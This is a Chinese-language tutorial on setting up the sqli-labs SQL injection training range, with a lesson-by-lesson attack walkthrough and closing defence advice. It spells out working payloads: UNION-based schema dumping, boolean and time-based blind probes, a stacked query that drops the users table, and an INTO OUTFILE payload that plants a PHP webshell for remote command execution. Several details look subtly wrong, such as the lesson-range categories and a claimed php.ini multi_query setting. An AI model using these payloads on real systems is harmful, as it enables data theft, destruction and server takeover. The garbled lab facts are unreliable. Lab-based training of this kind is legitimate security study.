sqli-labs-master靶场安装、使用、关卡攻略（1~65关全）

摘要

sqli-labs-master是一个开源的SQL注入漏洞练习平台，专为安全研究人员和开发者设计，涵盖65个不同难度的SQL注入场景。本文从环境搭建、靶场功能解析到逐关通关策略，系统化梳理了从安装到实战的完整流程，帮助读者高效掌握SQL注入漏洞的原理与防御方法。

一、sqli-labs-master靶场安装指南

1.1 环境准备

• 操作系统：推荐Linux（Ubuntu/CentOS）或Windows 10+（需支持PHP和MySQL）。
• 软件依赖：
  • Web服务器：Apache/Nginx
  • 数据库：MySQL 5.7+
  • 编程语言：PHP 7.x
• 推荐工具：
  • Docker（快速部署）
  • XAMPP/WAMP（集成环境）

1.2 安装步骤（以Ubuntu为例）

1. 安装依赖：

   sudo apt update
   sudo apt install apache2 mysql-server php php-mysql libapache2-mod-php

2. 下载靶场：

   git clone https://github.com/Audi-1/sqli-labs.git
   cd sqli-labs

3. 配置数据库：
   • 登录MySQL：mysql -u root -p
   • 创建数据库和用户：

     CREATE DATABASE security;
     GRANT ALL PRIVILEGES ON security.* TO 'sqliuser'@'localhost' IDENTIFIED BY 'sqlipass';
     FLUSH PRIVILEGES;

4. 导入初始数据：

   mysql -u sqliuser -p security < sql-connections/setup-db.sql

5. 配置Apache：
   • 将靶场目录移动到Apache可访问路径（如/var/www/html/sqli-labs）。
   • 修改/etc/apache2/apache2.conf，确保<Directory>配置允许PHP执行。
6. 访问靶场：
   • 浏览器访问http://localhost/sqli-labs，点击“Setup/reset Database for labs”初始化。

1.3 常见问题解决

• 数据库连接失败：检查php.ini中的mysqli.default_host、mysqli.default_user和mysqli.default_pw。
• PHP报错：确保php-mysql扩展已启用（php.ini中取消注释extension=mysqli）。
• 权限问题：运行chmod -R 755 /var/www/html/sqli-labs。

二、靶场功能解析

2.1 靶场结构

• Lessons目录：按难度分为65个关卡（Lesson-1到Lesson-65）。
• sql-connections目录：包含数据库配置和初始数据。
• include目录：核心代码（如数据库连接、注入检测逻辑）。

2.2 靶场分类

• 基于错误的注入（Lesson-1~7）：通过报错信息获取数据。
• 基于布尔的盲注（Lesson-8~14）：通过页面返回的真假判断注入结果。
• 基于时间的盲注（Lesson-15~22）：通过延迟响应判断注入结果。
• 堆叠查询（Lesson-23~28）：利用多语句执行实现复杂攻击。
• 二次注入（Lesson-29~35）：通过存储型漏洞绕过过滤。
• 其他类型：包括宽字节注入、HTTP头注入等（Lesson-36~65）。

三、关卡攻略（1~65关全）

3.1 基础注入（Lesson-1~7）

目标：利用错误信息获取数据库名、表名和字段名。
示例（Lesson-1）：

1. 输入' OR '1'='1观察报错。
2. 通过union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()获取表名。
3. 进一步查询字段：union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'。

技巧：

• 使用group_concat合并多行结果。
• 通过database()函数获取当前数据库名。

3.2 盲注（Lesson-8~22）

目标：在无报错信息的情况下，通过布尔或时间延迟推断数据。
示例（Lesson-8，布尔盲注）：

1. 判断数据库长度：' AND length(database())=5 --+（页面返回正常则长度为5）。
2. 逐字符猜解：' AND ascii(substr(database(),1,1))=115 --+（115对应’s’）。

示例（Lesson-15，时间盲注）：

1. 使用sleep(5)判断条件：' OR IF(1=1,sleep(5),0) --+（页面延迟5秒响应）。
2. 结合二分法提高效率：' OR IF(ascii(substr(database(),1,1))>100,sleep(5),0) --+。

3.3 堆叠查询（Lesson-23~28）

目标：通过分号执行多条SQL语句。
示例（Lesson-23）：

1. 输入1'; DROP TABLE users --+删除表（需确认权限）。
2. 更安全的用法：1'; SELECT * FROM users WHERE id=1 --+（查询数据）。

注意：堆叠查询需数据库支持多语句执行（PHP中需关闭mysqli.multi_query限制）。

3.4 二次注入（Lesson-29~35）

目标：利用存储型漏洞绕过过滤。
示例（Lesson-29）：

1. 注册用户admin'#，存储时#注释掉后续条件。
2. 登录时输入admin'#，实际执行SQL为SELECT * FROM users WHERE username='admin'#' AND password='...'。

防御建议：

• 使用预处理语句（Prepared Statements）。
• 对输出进行编码（如HTML实体转义）。

3.5 高级注入（Lesson-36~65）

目标：覆盖宽字节、HTTP头、文件读写等复杂场景。
示例（Lesson-36，宽字节注入）：

1. 输入%df' OR 1=1 --+，利用%df与\组合成運绕过addslashes。
2. 防御方法：设置SET NAMES gbk为SET NAMES utf8。

示例（Lesson-53，文件读写）：

1. 写入Webshell：union select 1,2,"<?php system($_GET['cmd']); ?>" into outfile '/var/www/html/shell.php'。
2. 访问http://target/shell.php?cmd=id执行命令。

四、总结与防御建议

4.1 核心漏洞原理

• 未过滤输入：直接拼接用户输入到SQL语句。
• 错误信息泄露：数据库报错暴露结构。
• 权限过高：数据库用户拥有文件读写或系统命令执行权限。

4.2 防御措施

1. 预处理语句：使用PDO或MySQLi的预处理功能。
2. 最小权限原则：数据库用户仅授予必要权限。
3. 输入验证：白名单过滤特殊字符（如单引号、分号）。
4. 错误处理：关闭生产环境的错误显示（display_errors=Off）。

4.3 学习建议

• 按顺序通关，逐步掌握不同注入类型。
• 结合Burp Suite等工具自动化测试。
• 参考OWASP Top 10理解实际风险。

通过sqli-labs-master的实战训练，开发者可系统化提升SQL注入攻防能力，为构建安全的应用奠定基础。